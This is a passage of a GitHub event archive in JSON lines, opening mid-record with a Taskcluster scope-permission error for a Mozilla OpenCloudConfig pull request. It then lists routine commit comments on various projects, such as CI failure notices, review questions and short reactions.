2016-09-26T23:22:20.849Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"OLDvap4WTzCmGla17qdlFw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"routes\\\": [\\n    \\\"index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n  ],\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"data\\\": {\\n      \\\"base\\\": {\\n        \\\"sha\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n        \\\"user\\\": {\\n          \\\"login\\\": \\\"mozilla-releng\\\"\\n        }\\n      },\\n      \\\"head\\\": {\\n        \\\"sha\\\": \\\"1b276fccd6e727a840ac706ab95b1255f6e48696\\\",\\n        \\\"user\\\": {\\n          \\\"email\\\": \\\"gregory.szorc@gmail.com\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 600,\\n    \\\"image\\\": \\\"grenade/opencloudconfig\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"--login\\\",\\n      \\\"-c\\\",\\n      \\\"git clone --quiet https://github.com/indygreg/OpenCloudConfig.git && cd OpenCloudConfig && git checkout master && echo \\\\\\\"do lint stuff here\\\\\\\"\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 11,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"indygreg\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"1b276fccd6e727a840ac706ab95b1255f6e48696\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"gregory.szorc@gmail.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Validate submission (not implemented)\\\",\\n    \\\"description\\\": \\\"todo: run a linter against json and powershell files\\\",\\n    \\\"owner\\\": \\\"gregory.szorc@gmail.com\\\",\\n    \\\"source\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T23:22:20.663Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T23:22:20.663Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MpcwZMTjSyW0bUz9oHALig\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T23:22:20.663Z\\\"\\n}\\n  time:     2016-09-26T23:22:20.849Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"OLDvap4WTzCmGla17qdlFw\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"routes\": [\n                        \"index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\"\n                    ],\n                    \"workerType\": \"github-worker\",\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ]\n                        },\n                        \"data\": {\n                            \"base\": {\n                                \"sha\": \"a41b2c9df1641b2776a283324acc78675a0ed251\",\n                                \"user\": {\n                                    \"login\": \"mozilla-releng\"\n                                }\n                            },\n                            \"head\": {\n                                \"sha\": \"1b276fccd6e727a840ac706ab95b1255f6e48696\",\n                                \"user\": {\n                                    \"email\": \"gregory.szorc@gmail.com\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 600,\n                        \"image\": \"grenade/opencloudconfig\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"--login\",\n                            \"-c\",\n                            \"git clone --quiet https://github.com/indygreg/OpenCloudConfig.git && cd OpenCloudConfig && git checkout master && echo \\\"do lint stuff here\\\"\"\n                        ],\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 11,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/OpenCloudConfig.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"a41b2c9df1641b2776a283324acc78675a0ed251\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/indygreg/OpenCloudConfig.git\",\n                            \"GITHUB_HEAD_USER\": \"indygreg\",\n                            \"GITHUB_HEAD_SHA\": \"1b276fccd6e727a840ac706ab95b1255f6e48696\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"gregory.szorc@gmail.com\"\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Validate submission (not implemented)\",\n                        \"description\": \"todo: run a linter against json and powershell files\",\n                        \"owner\": \"gregory.szorc@gmail.com\",\n                        \"source\": \"https://github.com/indygreg/OpenCloudConfig.git\"\n                    },\n                    \"created\": \"2016-09-26T23:22:20.663Z\",\n                    \"deadline\": \"2016-09-27T23:22:20.663Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"MpcwZMTjSyW0bUz9oHALig\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-27T23:22:20.663Z\"\n                },\n                \"time\": \"2016-09-26T23:22:20.849Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-26T23:22:20Z"}
{"id":"4621070556","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19182165,"position":null,"line":null,"path":null,"commit_id":"d49f1afeb72d4c978b8265596c6de3843beb80fe","created_at":"2016-09-26T23:22:48Z","updated_at":"2016-09-26T23:22:48Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36138/testReport/) for this commit**"}},"created_at":"2016-09-26T23:22:48Z"}
{"id":"4621070677","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310d1public"},"payload":{"comment":{"id":19182168,"position":null,"line":null,"path":null,"commit_id":"85b68b4ddc0a5698ec44c4a734dbcf4cdfe7dd2e","created_at":"2016-09-26T23:22:51Z","updated_at":"2016-09-26T23:22:51Z","body":"@CPSC310Bot "}},"created_at":"2016-09-26T23:22:51Z"}
{"id":"4621074403","type":"CommitCommentEvent","actor":{"login":"vonbecmann"},"repo":{"name":"ThierryGoubier/SmaCC"},"payload":{"comment":{"id":19182180,"position":9,"line":25,"path":"SmaCC-Smalltalk-Parser.package/StParser.class/class/definitionComment.st","commit_id":"78442debec83246969050e7308a3261a19c1c6fe","created_at":"2016-09-26T23:23:49Z","updated_at":"2016-09-26T23:23:49Z","body":"what's \\cA ?"}},"created_at":"2016-09-26T23:23:49Z"}
{"id":"4621076984","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19182192,"position":null,"line":null,"path":null,"commit_id":"1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11","created_at":"2016-09-26T23:24:28Z","updated_at":"2016-09-26T23:24:28Z","body":"ps. I might look into having a matcher per OneOf, but the challenge will be trying to avoid having WhenT0..Tn or similar, as they're very unintuitive.  It'll be interesting to see what you come up with!"}},"created_at":"2016-09-26T23:24:28Z"}
{"id":"4621078005","type":"CommitCommentEvent","actor":{"login":"tsteur"},"repo":{"name":"piwik/piwik"},"payload":{"comment":{"id":19182200,"position":22,"line":22,"path":"plugins/Goals/Updates/3.0.0-b1.php","commit_id":"ab3eba1b854e978ed4f3bcb3b144a4fff2964aab","created_at":"2016-09-26T23:24:42Z","updated_at":"2016-09-26T23:24:42Z","body":"Can we use the new migration factory here?"}},"created_at":"2016-09-26T23:24:42Z"}
{"id":"4621082923","type":"CommitCommentEvent","actor":{"login":"vonbecmann"},"repo":{"name":"ThierryGoubier/SmaCC"},"payload":{"comment":{"id":19182221,"position":23,"line":141,"path":"SmaCC-Smalltalk-Parser.package/StParser.class/class/definitionComment.st","commit_id":"78442debec83246969050e7308a3261a19c1c6fe","created_at":"2016-09-26T23:26:00Z","updated_at":"2016-09-26T23:26:00Z","body":"i've seen those periods after the method's name, but is it Ok to do that? weird"}},"created_at":"2016-09-26T23:26:00Z"}
{"id":"4621083195","type":"CommitCommentEvent","actor":{"login":"andschwa"},"repo":{"name":"daxian-dbw/PowerShell"},"payload":{"comment":{"id":19182224,"position":null,"line":null,"path":null,"commit_id":"167f8989b08179525abd82a2834886bf43b9019f","created_at":"2016-09-26T23:26:06Z","updated_at":"2016-09-26T23:26:06Z","body":"LGTM."}},"created_at":"2016-09-26T23:26:06Z"}
{"id":"4621083313","type":"CommitCommentEvent","actor":{"login":"Demonid"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19182226,"position":null,"line":null,"path":null,"commit_id":"5e5fe37a7ef2a76d7bd59250a7702af052a03d20","created_at":"2016-09-26T23:26:07Z","updated_at":"2016-09-26T23:26:07Z","body":"It's like a header bargain sale!"}},"created_at":"2016-09-26T23:26:07Z"}
{"id":"4621087349","type":"CommitCommentEvent","actor":{"login":"luckydonald"},"repo":{"name":"fabioz/PyDev.Debugger"},"payload":{"comment":{"id":19182250,"position":14,"line":67,"path":"_pydev_bundle/pydev_console_utils.py","commit_id":"2fe7a16380352235280f0d59789ac7fcebfff3f2","created_at":"2016-09-26T23:27:12Z","updated_at":"2016-09-26T23:27:12Z","body":"👍 "}},"created_at":"2016-09-26T23:27:12Z"}
{"id":"4621088984","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19182255,"position":null,"line":null,"path":null,"commit_id":"1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11","created_at":"2016-09-26T23:27:37Z","updated_at":"2016-09-26T23:27:37Z","body":"Yeah i definitely agree on not wanting the T0 bits...it's very unfortunate\nthat the type constraints are not part of the signature :(\n\nOn Mon, Sep 26, 2016 at 7:24 PM, Will Mooar <notifications@github.com>\nwrote:\n\n> ps. I might look into having a matcher per OneOf, but the challenge will\n> be trying to avoid having WhenT0..Tn or similar, as they're very\n> unintuitive. It'll be interesting to see what you come up with!\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Jagged/OneOf/commit/1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11#commitcomment-19182192>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD_ohUX2ySrujEa2t8gru0ih-2pg1Gcqks5quFQsgaJpZM4KGnj9>\n> .\n>\n"}},"created_at":"2016-09-26T23:27:37Z"}
{"id":"4621090082","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182260,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:27:55Z","updated_at":"2016-09-26T23:27:55Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:27:55Z"}
{"id":"4621090214","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182262,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:27:59Z","updated_at":"2016-09-26T23:27:59Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:27:59Z"}
{"id":"4621090454","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182263,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:02Z","updated_at":"2016-09-26T23:28:02Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:02Z"}
{"id":"4621091086","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182265,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:12Z","updated_at":"2016-09-26T23:28:12Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:12Z"}
{"id":"4621091108","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182266,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:12Z","updated_at":"2016-09-26T23:28:12Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:12Z"}
{"id":"4621091132","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182267,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:12Z","updated_at":"2016-09-26T23:28:12Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:12Z"}
{"id":"4621091134","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182268,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:12Z","updated_at":"2016-09-26T23:28:12Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:12Z"}
{"id":"4621091147","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182269,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:13Z","updated_at":"2016-09-26T23:28:13Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:13Z"}
{"id":"4621091157","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182270,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:13Z","updated_at":"2016-09-26T23:28:13Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:13Z"}
{"id":"4621091168","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182271,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:13Z","updated_at":"2016-09-26T23:28:13Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:13Z"}
{"id":"4621091176","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182272,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:13Z","updated_at":"2016-09-26T23:28:13Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:13Z"}
{"id":"4621091188","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182273,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:13Z","updated_at":"2016-09-26T23:28:13Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:13Z"}
{"id":"4621091196","type":"CommitCommentEvent","actor":{"login":"Guiz7"},"repo":{"name":"ava-project/ava-core"},"payload":{"comment":{"id":19182274,"position":null,"line":null,"path":null,"commit_id":"9c68ac7eadd21a04e4f377c946b0fe2d133078fd","created_at":"2016-09-26T23:28:13Z","updated_at":"2016-09-26T23:28:13Z","body":"pas vraiment push ils y étaient déjà, mais ouai je vais check le .gitignore :)"}},"created_at":"2016-09-26T23:28:13Z"}
{"id":"4621091198","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19182275,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T23:28:13Z","updated_at":"2016-09-26T23:28:13Z","body":"tu tranquilo... jajaj"}},"created_at":"2016-09-26T23:28:13Z"}
{"id":"4621092680","type":"CommitCommentEvent","actor":{"login":"ecogrammer"},"repo":{"name":"ito-artsfarm/itoartsfarm2016-wp"},"payload":{"comment":{"id":19182284,"position":null,"line":null,"path":null,"commit_id":"64b13bd32f3f6273d73b5f2ec5e9082227dbb8bd","created_at":"2016-09-26T23:28:36Z","updated_at":"2016-09-26T23:28:36Z","body":"@makizonokenji 細かいレイアウトの崩れを直してアップしました。"}},"created_at":"2016-09-26T23:28:36Z"}
{"id":"4621093651","type":"CommitCommentEvent","actor":{"login":"Alkallid"},"repo":{"name":"Makuta-Miras/The-Enclave"},"payload":{"comment":{"id":19182288,"position":null,"line":null,"path":null,"commit_id":"fce3be9d767bb527f2670ac8b08f225590b69bdc","created_at":"2016-09-26T23:28:49Z","updated_at":"2016-09-26T23:28:49Z","body":"Boom."}},"created_at":"2016-09-26T23:28:49Z"}
{"id":"4621093657","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19182289,"position":null,"line":null,"path":null,"commit_id":"68c1c2abf985055add75ee9526e73e442902ef08","created_at":"2016-09-26T23:28:49Z","updated_at":"2016-09-26T23:28:49Z","body":"@CPSC310Bot"}},"created_at":"2016-09-26T23:28:49Z"}
{"id":"4621093708","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19182290,"position":null,"line":null,"path":null,"commit_id":"68c1c2abf985055add75ee9526e73e442902ef08","created_at":"2016-09-26T23:28:50Z","updated_at":"2016-09-26T23:28:50Z","body":"Request received; should be processed within 2 minutes."}},"created_at":"2016-09-26T23:28:50Z"}
{"id":"4621094538","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19182293,"position":null,"line":null,"path":null,"commit_id":"68c1c2abf985055add75ee9526e73e442902ef08","created_at":"2016-09-26T23:29:04Z","updated_at":"2016-09-26T23:29:04Z","body":"4 passing, 27 failing, 0 skipped (12.9%)\nName of first spec to fail: ~Colossus~NOT token should be implemented."}},"created_at":"2016-09-26T23:29:04Z"}
{"id":"4621097320","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"vnkumar27/dsp"},"payload":{"comment":{"id":19182297,"position":null,"line":null,"path":null,"commit_id":"9c22237270aaeea88823bd56b8d7c61bc311ded5","created_at":"2016-09-26T23:29:45Z","updated_at":"2016-09-26T23:29:45Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @vnkumar27 \r\n\r\nNice work on the advanced Python problems!  Here are some comments:\r\n- Q1-Q3: I cannot check your work here since you don't show the results and the Python code is not properly indented on the markdown page. All the code should be in the file 'advanced_python_regex.py'. Right now, the file only contains the answer for Q4, which is correct!\r\n- Q8: The code seems to work properly, but the printout on the markdown page omits the faculty names for all but the first member ('Scarlett', 'Bellamy').\r\n\r\n👍 "}},"created_at":"2016-09-26T23:29:45Z"}
{"id":"4621100951","type":"CommitCommentEvent","actor":{"login":"whitepear"},"repo":{"name":"whitepear/mongoose-tutorial"},"payload":{"comment":{"id":19182304,"position":null,"line":null,"path":null,"commit_id":"42b847bb115897b36386b03e2ff85c505c3dc949","created_at":"2016-09-26T23:30:35Z","updated_at":"2016-09-26T23:30:35Z","body":"App works correctly in latest version. Issue in this commit stems from newnote.jade, line 43. 'btn' is not an element, button is."}},"created_at":"2016-09-26T23:30:35Z"}
{"id":"4621104377","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"JuliaOpt/AmplNLWriter.jl"},"payload":{"comment":{"id":19182312,"position":null,"line":null,"path":null,"commit_id":"75d9df32b7997d6404268ab182a6fbd770e31d43","created_at":"2016-09-26T23:31:27Z","updated_at":"2016-09-26T23:31:27Z","body":"Worth adding a test?"}},"created_at":"2016-09-26T23:31:27Z"}
{"id":"4621111427","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19182332,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T23:33:17Z","updated_at":"2016-09-26T23:33:17Z","body":"My previous comment still applies - `StyleGetProperty` return an object (which can also be null). It is the cast which turns it into a Gdk.Color. i.e. I think `colorVal is Gdk.Color` is always false."}},"created_at":"2016-09-26T23:33:17Z"}
{"id":"4621112068","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19182335,"position":72,"line":67,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-26T23:33:28Z","updated_at":"2016-09-26T23:33:28Z","body":"Should we assume anonymous is a common use case for cloud services?\n\nWhat if we waited until someone asked for non-default (as opposed to making\nthe default pass through anonymous?)\n\nOn 27 Sep 2016 4:52 am, \"sethp-jive\" <notifications@github.com> wrote:\n\n> I think rethrowing breaks anonymous credentials because the default chain\n> won't provide them – so even for open domain access you'll still have to\n> load in some parse-able credentials (& I've never tried to explicitly\n> configure \"anonymous\"). Otherwise, the last thing the chain does is:\n>\n>         throw new AmazonClientException(\"Unable to load AWS credentials from any provider in the chain\");\n>\n> Perhaps the right call is to extend the default chain with a last-resort\n> credentials provider that always returns anonymous credentials? So in lieu\n> of new DefaultAWSCredentialsProviderChain():\n>\n> new AWSCredentialsProviderChain(\n>         new EnvironmentVariableCredentialsProvider(),\n>         new SystemPropertiesCredentialsProvider(),\n>         new ProfileCredentialsProvider(),\n>         new EC2ContainerCredentialsProviderWrapper(),\n>         new AWSCredentialsProvider() {\n>           @Override public AWSCredentials getCredentials() {\n>             return new AnonymousAWSCredentials();\n>           }\n>\n>           @Override public void refresh() {\n>           }\n>         })\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/openzipkin/zipkin/commit/58fa61a78af904dd775dff571e930f95b4e78815#commitcomment-19179679>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAD618HcZTe-Kqaj3QNhNnmPbg7VvXfZks5quDCcgaJpZM4KFL3a>\n> .\n>\n"}},"created_at":"2016-09-26T23:33:28Z"}
{"id":"4621117813","type":"CommitCommentEvent","actor":{"login":"titipata"},"repo":{"name":"KordingLab/KordingLab.github.io"},"payload":{"comment":{"id":19182353,"position":null,"line":null,"path":null,"commit_id":"0d515049d0236f9e997ff9ef4b8e9c8e801a00e0","created_at":"2016-09-26T23:35:05Z","updated_at":"2016-09-26T23:35:05Z","body":"@aribenjamin, you miss one square bracket in `google scholar]` link"}},"created_at":"2016-09-26T23:35:05Z"}
{"id":"4621120575","type":"CommitCommentEvent","actor":{"login":"vgenty"},"repo":{"name":"LArbys/larlitecv"},"payload":{"comment":{"id":19182359,"position":null,"line":null,"path":null,"commit_id":"4af35b0ee543e222b58500141fc73b8a03944efc","created_at":"2016-09-26T23:35:53Z","updated_at":"2016-09-26T23:35:53Z","body":"🔥"}},"created_at":"2016-09-26T23:35:53Z"}
{"id":"4621121404","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":19182363,"position":41,"line":354,"path":"app/src/main/java/com/kamron/pogoiv/OcrHelper.java","commit_id":"a822a160185afb49981cd61e81aaa760baaf0386","created_at":"2016-09-26T23:36:07Z","updated_at":"2016-09-26T23:36:07Z","body":"Assuming you mean `GoIVSettings.getInstance`, it existed from earlier."}},"created_at":"2016-09-26T23:36:07Z"}
{"id":"4621122805","type":"CommitCommentEvent","actor":{"login":"sevoku"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19182367,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T23:36:28Z","updated_at":"2016-09-26T23:36:28Z","body":"Why? the runtime knows the type of the (boxed) object. So:\r\n```c#\r\nobject colorVal = \"xyz\";\r\nif (colorVal is Gdk.Color)   // << this is always false, because colorVal is a string\r\n\tcolor = (Gdk.Color)colorVal;\r\n```"}},"created_at":"2016-09-26T23:36:28Z"}
